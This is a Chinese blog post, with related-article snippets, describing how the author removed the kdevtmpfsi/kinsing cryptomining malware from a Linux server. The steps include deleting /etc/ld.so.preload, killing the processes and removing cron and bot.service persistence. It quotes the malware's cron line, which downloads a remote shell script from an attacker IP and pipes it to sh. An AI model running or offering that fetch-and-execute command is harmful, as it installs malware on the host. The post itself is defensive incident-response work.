挖矿病毒kdevtmpfsi,kinsing进程隐藏解决

小码人生

已于 2022-11-18 15:43:02 修改

阅读量2k

点赞数 2

文章标签： linux

于 2022-05-31 16:53:09 首次发布

本文链接：https://blog.csdn.net/weixin_40281256/article/details/125068181

版权

参考了下面这篇文章最终解决了自己的问题：记录一次linux负载和总cpu高，top查看不到高占用cpu资源的相关问题排查_汪汪伟的博客-CSDN博客

我的问题当时输入top未找到耗cup的进程然后根据上面博主的提示查看了目录cat /etc/ld.so.preload内容被转到

然后在/etc下找到ld.so.preload

删除ld.so.preload

输入top，进程出来了

然后 systemctl status 11468 找到病毒及病毒守护线程对应目录并删除， rm -rf kdevtmpfsi，rm -rf kinsing

然后crontab -l 查看异常定时任务

最终在cd /var/spool/cron/目录下找到文件root,里面有定时任务

wget -q -o - http://91.241.19.134/unk.sh | sh > /dev/null 2>&1

删除定时任务

然后查看守护进程ps -aux | grep kinsing

查看病毒进程ps -aux | grep kdevtmpfsi

杀掉kill -9 22329 11468

然后成功杀掉病毒进程

========================2022.11.18====================================

最近发现新病毒，增加了bot.service的切入，

搜索find / -name bot.service 进入对应文件

首先进入etc下删除kinsing

再返回到之前查找到的bot.service位置,kill掉对应的守护线程

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

小码人生

关注关注

2
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Linux——kdevtmpfsi（挖矿）进程解决方法与解决过程

Hern（宋兆恒）

03-23

1万+

问题 CPU堵塞（100%）。我这里的主进程是YDService，你的可能和我的不一致。原因服务器密码被别人知道防火墙设置问题 …… 解决方法 1、查看进程，记录下占用CPU的进程PID（包括挖矿主进程PID）命令： top 或 ps aux | less 2、查看异常链接（有助于发现问题缘由），命令： netstat -natp 或 netstat -n...

挖矿病毒 kdevtmpfsi 处理

owenzhang的博客

11-30

925

我参与11月更文挑战的第21天，活动详情查看：2021最后一次更文挑战症状表现服务器CPU资源使用一直处于100%的状态，通过 top 命令查看，发现可疑进程 kdevtmpfsi。通过 google搜索，发现这是挖矿病毒。排查方法首先：查看 kdevtmpfsi 进程，使用 ps -ef | grep kdevtmpfsi ps -ef | grep kinsing命...

参与评论您还未登录，请先登录后发表或查看评论

服务器遭遇挖矿行为-相应进程被隐藏

Selinu的博客

03-06

2966

针对于服务器被植入挖矿程序可采用的方法

/etc下的文件都被删了？？？

最新发布

sqlora的专栏

02-08

952

rw-r--r-- 1 root root 14096465920 2月 8 09:41 disk1backup.tar。drwx------ 14 root root 4096 2月 8 09:54 ../记得操作系统版本是ubuntu22.04，先别慌，现在想办法把/etc的文件都恢复回去才行。找一台相同操作系统环境的，将/etc目录打包，用u盘插入当前坏的机器。完成后重启sshd服务，幸运的是成功启动了。完事后发现ssh无法登录了？然后ssh服务，scp都不能用了。

Linux服务器成功处理kdevtmpfsi挖矿程序，亲测有效！

x-dragon8899的博客

09-04

871

通过 top 命令查看服务器，发现CPU资源使用一直处于100%的状态，原因是kdevtmpfsi进程占用了CPU，现需处理掉这个挖矿程序。发现没有 kdevtmpfsi 进程占用CPU，清理成功！服务器CPU从52%恢复为3.5%！

[服务器异常] kdevtmpfsi 进程

yyp946的博客

01-14

549

这个进程的启动是通过 redis，那么需要检查 redis 用的 cron，直接查看 /var/spool/cron 目录下的文件。起初的操作就是直接 kill 掉，但是 kill 掉后进程又自动启动，能自动启动应该有一个启动脚本在处理，先处理进程问题。今天突然收到了服务器的报警信息，登录服务器通过 top 检查发现一个不认识的进程占用了大量的 CPU。通过 systemct 找出这个进程相关信息，直接 kill 掉 5906 10237，同时删除文件。清空 redis 文件，完成异常处理。

【安全】查杀linux隐藏挖矿病毒rcu_tasked

飞的博客

10-25

3310

这是黑客使用的批量蔓延病毒的工具，通过如下脚本实现。

confluence挖矿病毒（kdevtmpfsi 、solrd）解决

lin351550660的专栏

01-12

3723

自己安装了conference，没用1周。发现服务器内存被吃完了。定位问题： 1、之前就听说过confluence 有漏洞攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索：confluence挖矿病毒 2、感谢https://www.cnblogs.com/hack404/p/11464890.html作者的帮助。处理过程： 1. 先封掉外网HTTP 端口使用腾讯云控制台安全组设置80端口不允许访问。 2. 查杀进程使用命令：top 查..

php+挖矿病毒,Kdevtmpfsi 挖矿病毒处理方式

weixin_42165712的博客

03-11

703

中毒线上状态：CPU占满90%+，引发线上服务处理异常缓慢等问题，从而导致业务异常。处理方法：1. 查看占用高的进程。# top2. 排序按下1，找到占用高CPU的进程后，Ctrl+z退出。3. 查找对应的进程号。(可以使用pgrep来更加精确查询)# ps -aux | grep kdevtmpfsi# ps -aux | grep kinsing4. 杀掉该进程。# kill -9 12739...

记一次挖矿病毒kdevtmpfsi，xmrig，定时任务crontab不能更改，及莫名的curl，导致CPU过高，占用网络连接数过大的解决办法

yongxuezhen的博客

04-14

3593

一、警告二、解决病毒 1.docker 引发的挖矿程序的惨案（1）病毒原因（2）解决病毒 2.定时任务crontab不能更改 3.更改ssh端口 4.莫名的curl，导致CPU过高三、完成一、警告在linux中使用docker，redis,ssh，tomcat等的时候，建议全部更改成自己自定义的端口，开启防火墙并开发自己需要的端口。二、解决病毒 1.d...

linux下“kdevtmpfsi“与“kinsing“进程导致系统卡顿

全栈开发者的博客

11-23

1472

系统卡顿，top下发下cpu异常 kdevtmpfsi是一种挖矿病毒，而且有守护进程，单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing，需要kill后才能解决问题。 1.杀掉进程并删除文件（杀掉之后还会重新启动） ps -aux | grep kinsing kill -9 15881 ps -aux | grep kdevtmpfsi kill -9 15881 rm -rf /tmp/kdevtmpfsi rm -rf /var/tmp/kins.

linux遭入侵挖矿进程被隐藏案例分析

whatday的专栏

10-25

2535

目录一、背景二、入侵分析三、样本分析四、附录 IOCs：一、背景云鼎实验室曾分析不少入侵挖矿案例，研究发现入侵挖矿行为都比较粗暴简单，通过 top 等命令可以直接看到恶意进程，挖矿进程不会被刻意隐藏；而现在，我们发现黑客开始不断使用一些隐藏手段去隐藏挖矿进程而使它获得更久存活，今天分析的内容是我们过去一个月内捕获的一起入侵挖矿事件。二、入侵分析本次捕获案例的入侵流程与以往相比，没有特殊的地方，也是利用通用漏洞入侵服务器并获得相关权限，从而植入挖矿程序再进行隐藏。通过对几

处理处理kdevtmpfsi挖矿病毒以及他的守护进程kinsing

Owen_goodman的博客

12-27

8557

服务器CPU资源占用一直处于100%的状态，检查发现是kdevtmpfsi占用导致的，此进程为挖矿程序。处理步骤如下： kdevtmpfsi 进程处理： 1、# top 查看cpu占用情况，找到占用cpu的进程最后是 kdevtmpfsi 2、# netstat -natp 根据上面的进程名查看与内网的 tcp 链接异常，看到陌生ip，查出为国外i...

记一次linux隐藏进程libgcc_a挖矿木马处置

beichenyyds的博客

01-15

1900

隐藏进程挖矿应急处置

挖矿病毒清理记录（隐藏进程处理）

深耕AI领域，专注中、高人工智能领域发展；同步研究电磁学及超导材料、量子力学；关注能源发展和技术，同时进行医学创新

05-21

714

top命令查看cpu总占用率已超50%，但单独的进程加起来未超10%，怀疑有隐藏进程。监控一段时间后，发现CPU占用率恢复到正常水平，异常进程也未启动。在ecs中配置出访拒绝该ip出访请求。发现有异常进程CPU占用率近50%阿里云ECS报CPU预警。

服务器第一次被黑：裸奔的docker 活不过一夜 kinsing挖矿病毒

韩旭051的博客

03-15

1115

服务器卡卡的一看 CPU 用了百分之百以为是 finalshell 的问题特地去腾讯云后台看了一下发现腾讯云后台连监控都没了

病毒处理 kdevtmpfsi & kinsing

qw311113qin的博客

05-22

754

服务器遭到入侵，单删病毒进程解决不了，要找到它的根。病毒进程删了还会继续被拉起，估计就是被植入了实时任务，先查看服务器计划任务的日志/var/log/cron 发现了病毒脚本：http://91.241.19.134/unk.sh 希望有能力的大佬处理下，为民除害。从日志看到，病毒是普通用户执行的，到对应普通用户的定时任务下查看，在/var/spool/cron下的letsun用户定时任务中是发现有该病毒下载执行脚本的，清理掉。也有的病毒是root运行的，总之基本上都是在定时任务中，都要

kdevtmpfsi & kinsing 挖矿病毒

chizhou52501314的博客

03-03

1562

一直寄希望于暂时不会被攻击，事实证明互联网不会让你失望，网络险恶，“裸奔”慎重，只要你裸着，肯定会有人发现你，保护好自己最重要

服务器中挖矿病毒kinsing的临时处理方法

企业数字化转型卫淼全栈技术工作室

06-02

1147

ps -aux | grep kinsing病毒名，查找病毒进程，然后杀死进程，如果杀死后，还会生成，那就查计划任务是否也被篡改了，crontab -l命令查看当前登录的用户计划任务，如果有异常的计划任务，那么就使用crontab -r命令删除所有的计划任务，删除ssh无密登录的秘钥（cd ~/.ssh ）。一般解决kinsing病毒的方法，是top c 查100%的进程，并获取进程pid，然后使用。服务器中挖矿病毒，非常郁闷，删了还继续，最后使用了两种方式，暂时解决病毒问题。3、服务器漏洞升级、打补丁。

linux感染挖矿病毒

01-27

根据提供的引用内容，以下是处理Linux感染挖矿病毒的解决方案： 1. 首先，使用命令行工具（如`ps`、`top`）查看系统中正在运行的进程，找出可能是挖矿病毒的进程。可以使用以下命令： ```shell ps aux | grep miner ``` 或者 ```shell top ``` 2. 找到挖矿病毒进程后，使用`kill`命令终止该进程。可以使用以下命令： ```shell kill <进程ID> ``` 3. 如果上述步骤无法解决问题，可能存在其他类型的挖矿病毒，如pamdicks病毒。此时，可以使用杀毒软件（如VirusTotal）对系统进行全面扫描，以检测和清除潜在的恶意文件。VirusTotal是一个免费的在线扫描服务，可以检测文件、域名、IP地址、URL等是否含有恶意代码或威胁。请注意，处理挖矿病毒需要小心谨慎，建议在专业人士的指导下进行操作。